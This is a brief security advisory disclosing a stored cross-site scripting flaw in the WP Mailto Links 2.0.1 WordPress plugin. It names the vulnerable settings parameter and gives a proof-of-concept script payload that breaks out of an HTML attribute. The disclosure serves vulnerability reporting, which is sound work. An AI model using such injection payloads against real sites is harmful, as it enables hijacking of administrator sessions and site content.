================================================================================ # WordPress WP Mailto Links 2.0.1 - Stored Cross Site Scripting ================================================================================ # Author: Ehsan Hosseini # Vendor Homepage: https://wordpress.org/plugins/wp-mailto-links/ # Software Link : https://downloads.wordpress.org/plugin/wp-mailto-links.2.0.1.zip # Version : 2.0.1 # Date: 12/03/2016 # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/wpmailtolinks-xss.txt ================================================================================ # Vulnerability Details : Type : Stored XSS Minimum Level of Access Required : Change Plugin Values. # PoC : In the following field put the payload as below http://localhost/wordpress/wp-admin/options-general.php?page=wp-mailto-links-option-page Vulnerable Parameter : wp-mailto-links[no_icon_class] = "><script>alert('Ehsan Cod3r')</script> ================================================================================ # Ya Fateme! In Roza Hassan Ye Ghoshe Kez Karde ! In Roza Kasi Az Hal Emam Zaman Khabar Nadre ! Vay Madaram! ================================================================================ # Discovered By : Ehsan Hosseini (EhsanSec.ir) ================================================================================